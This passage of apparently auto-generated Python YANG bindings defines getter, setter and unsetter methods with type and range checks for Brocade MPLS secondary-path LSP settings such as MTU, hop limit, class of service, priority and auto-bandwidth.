t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'576..1526']}), is_leaf=True, yang_name="secpath-ipmtu", rest_name="ipmtu", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'IP Packet Maximum Transmission Unit', u'cli-full-no': None, u'alt-name': u'ipmtu'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """secpath_ipmtu must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'576..1526']}), is_leaf=True, yang_name="secpath-ipmtu", rest_name="ipmtu", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'IP Packet Maximum Transmission Unit', u'cli-full-no': None, u'alt-name': u'ipmtu'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)""",
})
self.__secpath_ipmtu = t
if hasattr(self, '_set'):
self._set()
def _unset_secpath_ipmtu(self):
self.__secpath_ipmtu = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'576..1526']}), is_leaf=True, yang_name="secpath-ipmtu", rest_name="ipmtu", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'IP Packet Maximum Transmission Unit', u'cli-full-no': None, u'alt-name': u'ipmtu'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
def _get_lsp_adaptive(self):
return self.__lsp_adaptive
def _set_lsp_adaptive(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="lsp-adaptive", rest_name="adaptive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure LSP/secpath to be adaptive', u'cli-full-no': None, u'alt-name': u'adaptive'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_adaptive must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-adaptive", rest_name="adaptive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure LSP/secpath to be adaptive', u'cli-full-no': None, u'alt-name': u'adaptive'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)""",
})
self.__lsp_adaptive = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_adaptive(self):
self.__lsp_adaptive = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-adaptive", rest_name="adaptive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure LSP/secpath to be adaptive', u'cli-full-no': None, u'alt-name': u'adaptive'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
def _get_lsp_reoptimize_timer(self):
return self.__lsp_reoptimize_timer
def _set_lsp_reoptimize_timer(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'300..65535']}), is_leaf=True, yang_name="lsp-reoptimize-timer", rest_name="reoptimize-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure Reoptimization timer', u'cli-full-no': None, u'alt-name': u'reoptimize-timer'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_reoptimize_timer must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'300..65535']}), is_leaf=True, yang_name="lsp-reoptimize-timer", rest_name="reoptimize-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure Reoptimization timer', u'cli-full-no': None, u'alt-name': u'reoptimize-timer'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)""",
})
self.__lsp_reoptimize_timer = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_reoptimize_timer(self):
self.__lsp_reoptimize_timer = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'300..65535']}), is_leaf=True, yang_name="lsp-reoptimize-timer", rest_name="reoptimize-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure Reoptimization timer', u'cli-full-no': None, u'alt-name': u'reoptimize-timer'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
def _get_lsp_commit(self):
return self.__lsp_commit
def _set_lsp_commit(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="lsp-commit", rest_name="commit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Commit the changes to adaptive LSP', u'alt-name': u'commit', u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_commit must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-commit", rest_name="commit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Commit the changes to adaptive LSP', u'alt-name': u'commit', u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)""",
})
self.__lsp_commit = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_commit(self):
self.__lsp_commit = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-commit", rest_name="commit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Commit the changes to adaptive LSP', u'alt-name': u'commit', u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
def _get_lsp_record(self):
return self.__lsp_record
def _set_lsp_record(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'enable': {'value': 1}, u'disable': {'value': 0}},), is_leaf=True, yang_name="lsp-record", rest_name="record", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Enable/disable recording path routes', u'cli-full-no': None, u'alt-name': u'record'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='enable-disable', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_record must be of a type compatible with enable-disable""",
'defined-type': "brocade-mpls:enable-disable",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'enable': {'value': 1}, u'disable': {'value': 0}},), is_leaf=True, yang_name="lsp-record", rest_name="record", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Enable/disable recording path routes', u'cli-full-no': None, u'alt-name': u'record'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='enable-disable', is_config=True)""",
})
self.__lsp_record = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_record(self):
self.__lsp_record = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'enable': {'value': 1}, u'disable': {'value': 0}},), is_leaf=True, yang_name="lsp-record", rest_name="record", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Enable/disable recording path routes', u'cli-full-no': None, u'alt-name': u'record'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='enable-disable', is_config=True)
def _get_lsp_cos(self):
return self.__lsp_cos
def _set_lsp_cos(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..7']}), is_leaf=True, yang_name="lsp-cos", rest_name="cos", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure class of service', u'cli-full-no': None, u'alt-name': u'cos'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_cos must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..7']}), is_leaf=True, yang_name="lsp-cos", rest_name="cos", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure class of service', u'cli-full-no': None, u'alt-name': u'cos'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)""",
})
self.__lsp_cos = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_cos(self):
self.__lsp_cos = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..7']}), is_leaf=True, yang_name="lsp-cos", rest_name="cos", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure class of service', u'cli-full-no': None, u'alt-name': u'cos'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
def _get_lsp_hop_limit(self):
return self.__lsp_hop_limit
def _set_lsp_hop_limit(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), restriction_dict={'range': [u'0..255']}), is_leaf=True, yang_name="lsp-hop-limit", rest_name="hop-limit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Limit of hops the LSP can traverse', u'cli-full-no': None, u'alt-name': u'hop-limit'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint16', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_hop_limit must be of a type compatible with uint16""",
'defined-type': "uint16",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), restriction_dict={'range': [u'0..255']}), is_leaf=True, yang_name="lsp-hop-limit", rest_name="hop-limit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Limit of hops the LSP can traverse', u'cli-full-no': None, u'alt-name': u'hop-limit'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint16', is_config=True)""",
})
self.__lsp_hop_limit = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_hop_limit(self):
self.__lsp_hop_limit = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), restriction_dict={'range': [u'0..255']}), is_leaf=True, yang_name="lsp-hop-limit", rest_name="hop-limit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Limit of hops the LSP can traverse', u'cli-full-no': None, u'alt-name': u'hop-limit'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint16', is_config=True)
def _get_lsp_cspf_computation_mode(self):
return self.__lsp_cspf_computation_mode
def _set_lsp_cspf_computation_mode(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'use-igp-metric': {'value': 1}, u'use-te-metric': {'value': 2}},), is_leaf=True, yang_name="lsp-cspf-computation-mode", rest_name="cspf-computation-mode", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Specify cspf-computation-mode', u'cli-full-no': None, u'alt-name': u'cspf-computation-mode'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='cspf-computation-mode', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_cspf_computation_mode must be of a type compatible with cspf-computation-mode""",
'defined-type': "brocade-mpls:cspf-computation-mode",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'use-igp-metric': {'value': 1}, u'use-te-metric': {'value': 2}},), is_leaf=True, yang_name="lsp-cspf-computation-mode", rest_name="cspf-computation-mode", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Specify cspf-computation-mode', u'cli-full-no': None, u'alt-name': u'cspf-computation-mode'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='cspf-computation-mode', is_config=True)""",
})
self.__lsp_cspf_computation_mode = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_cspf_computation_mode(self):
self.__lsp_cspf_computation_mode = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'use-igp-metric': {'value': 1}, u'use-te-metric': {'value': 2}},), is_leaf=True, yang_name="lsp-cspf-computation-mode", rest_name="cspf-computation-mode", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Specify cspf-computation-mode', u'cli-full-no': None, u'alt-name': u'cspf-computation-mode'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='cspf-computation-mode', is_config=True)
def _get_lsp_traffic_engineering(self):
return self.__lsp_traffic_engineering
def _set_lsp_traffic_engineering(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=lsp_traffic_engineering.lsp_traffic_engineering, is_container='container', presence=False, yang_name="lsp-traffic-engineering", rest_name="traffic-engineering", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-compact-syntax': None, u'info': u'LSP traffic engineering parameters', u'alt-name': u'traffic-engineering', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_traffic_engineering must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=lsp_traffic_engineering.lsp_traffic_engineering, is_container='container', presence=False, yang_name="lsp-traffic-engineering", rest_name="traffic-engineering", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-compact-syntax': None, u'info': u'LSP traffic engineering parameters', u'alt-name': u'traffic-engineering', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='container', is_config=True)""",
})
self.__lsp_traffic_engineering = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_traffic_engineering(self):
self.__lsp_traffic_engineering = YANGDynClass(base=lsp_traffic_engineering.lsp_traffic_engineering, is_container='container', presence=False, yang_name="lsp-traffic-engineering", rest_name="traffic-engineering", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-compact-syntax': None, u'info': u'LSP traffic engineering parameters', u'alt-name': u'traffic-engineering', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='container', is_config=True)
def _get_priority(self):
return self.__priority
def _set_priority(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=priority.priority, is_container='container', presence=False, yang_name="priority", rest_name="priority", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'LSP setup and holding priority levels', u'cli-sequence-commands': None, u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """priority must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=priority.priority, is_container='container', presence=False, yang_name="priority", rest_name="priority", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'LSP setup and holding priority levels', u'cli-sequence-commands': None, u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='container', is_config=True)""",
})
self.__priority = t
if hasattr(self, '_set'):
self._set()
def _unset_priority(self):
self.__priority = YANGDynClass(base=priority.priority, is_container='container', presence=False, yang_name="priority", rest_name="priority", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'LSP setup and holding priority levels', u'cli-sequence-commands': None, u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='container', is_config=True)
def _get_lsp_exclude_any(self):
return self.__lsp_exclude_any
def _set_lsp_exclude_any(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=TypedListType(allowed_type=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..256']})), is_leaf=False, yang_name="lsp-exclude-any", rest_name="exclude-any", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Exclude any of the administrative groups', u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-full-command': None, u'cli-flat-list-syntax': None, u'alt-name': u'exclude-any'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_exclude_any must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=TypedListType(allowed_type=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..256']})), is_leaf=False, yang_name="lsp-exclude-any", rest_name="exclude-any", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Exclude any of the administrative groups', u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-full-command': None, u'cli-flat-list-syntax': None, u'alt-name': u'exclude-any'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)""",
})
self.__lsp_exclude_any = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_exclude_any(self):
self.__lsp_exclude_any = YANGDynClass(base=TypedListType(allowed_type=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..256']})), is_leaf=False, yang_name="lsp-exclude-any", rest_name="exclude-any", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Exclude any of the administrative groups', u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-full-command': None, u'cli-flat-list-syntax': None, u'alt-name': u'exclude-any'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
def _get_lsp_include_any(self):
return self.__lsp_include_any
def _set_lsp_include_any(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=TypedListType(allowed_type=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..256']})), is_leaf=False, yang_name="lsp-include-any", rest_name="include-any", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Include any of the administrative groups', u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-full-command': None, u'cli-flat-list-syntax': None, u'alt-name': u'include-any'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_include_any must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=TypedListType(allowed_type=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..256']})), is_leaf=False, yang_name="lsp-include-any", rest_name="include-any", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Include any of the administrative groups', u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-full-command': None, u'cli-flat-list-syntax': None, u'alt-name': u'include-any'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)""",
})
self.__lsp_include_any = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_include_any(self):
self.__lsp_include_any = YANGDynClass(base=TypedListType(allowed_type=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..256']})), is_leaf=False, yang_name="lsp-include-any", rest_name="include-any", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Include any of the administrative groups', u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-full-command': None, u'cli-flat-list-syntax': None, u'alt-name': u'include-any'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
def _get_lsp_include_all(self):
return self.__lsp_include_all
def _set_lsp_include_all(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=TypedListType(allowed_type=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..256']})), is_leaf=False, yang_name="lsp-include-all", rest_name="include-all", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Include all of the administrative groups', u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-full-command': None, u'cli-flat-list-syntax': None, u'alt-name': u'include-all'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_include_all must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=TypedListType(allowed_type=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..256']})), is_leaf=False, yang_name="lsp-include-all", rest_name="include-all", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Include all of the administrative groups', u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-full-command': None, u'cli-flat-list-syntax': None, u'alt-name': u'include-all'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)""",
})
self.__lsp_include_all = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_include_all(self):
self.__lsp_include_all = YANGDynClass(base=TypedListType(allowed_type=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..256']})), is_leaf=False, yang_name="lsp-include-all", rest_name="include-all", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Include all of the administrative groups', u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-full-command': None, u'cli-flat-list-syntax': None, u'alt-name': u'include-all'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
def _get_secpath_soft_preemption(self):
return self.__secpath_soft_preemption
def _set_secpath_soft_preemption(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="secpath-soft-preemption", rest_name="soft-preemption", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Set LSP soft preemption capability', u'cli-full-no': None, u'alt-name': u'soft-preemption'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """secpath_soft_preemption must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="secpath-soft-preemption", rest_name="soft-preemption", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Set LSP soft preemption capability', u'cli-full-no': None, u'alt-name': u'soft-preemption'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)""",
})
self.__secpath_soft_preemption = t
if hasattr(self, '_set'):
self._set()
def _unset_secpath_soft_preemption(self):
self.__secpath_soft_preemption = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="secpath-soft-preemption", rest_name="soft-preemption", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Set LSP soft preemption capability', u'cli-full-no': None, u'alt-name': u'soft-preemption'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
def _get_lsp_secpath_auto_bandwidth(self):
return self.__lsp_secpath_auto_bandwidth
def _set_lsp_secpath_auto_bandwidth(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=lsp_secpath_auto_bandwidth.lsp_secpath_auto_bandwidth, is_container='container', presence=True, yang_name="lsp-secpath-auto-bandwidth", rest_name="autobw", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable Auto-bandwidth on secondary path', u'cli-full-no': None, u'callpoint': u'MplsLspSecPathAutoBandwidth', u'cli-full-command': None, u'cli-add-mode': None, u'alt-name': u'autobw', u'cli-mode-name': u'config-router-mpls-lsp-$(../../lsp-name)-secpath-$(../secpath-name)-autobw'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_secpath_auto_bandwidth must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=lsp_secpath_auto_bandwidth.lsp_secpath_auto_bandwidth, is_container='container', presence=True, yang_name="lsp-secpath-auto-bandwidth", rest_name="autobw", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable Auto-bandwidth on secondary path', u'cli-full-no': None, u'callpoint': u'MplsLspSecPathAutoBandwidth', u'cli-full-command': None, u'cli-add-mode': None, u'alt-name': u'autobw', u'cli-mode-name': u'config-router-mpls-lsp-$(../../lsp-name)-secpath-$(../secpath-name)-autobw'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='container', is_config=True)""",
})
self.__lsp_secpath_auto_bandwidth = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_secpath_auto_bandwidth(self):
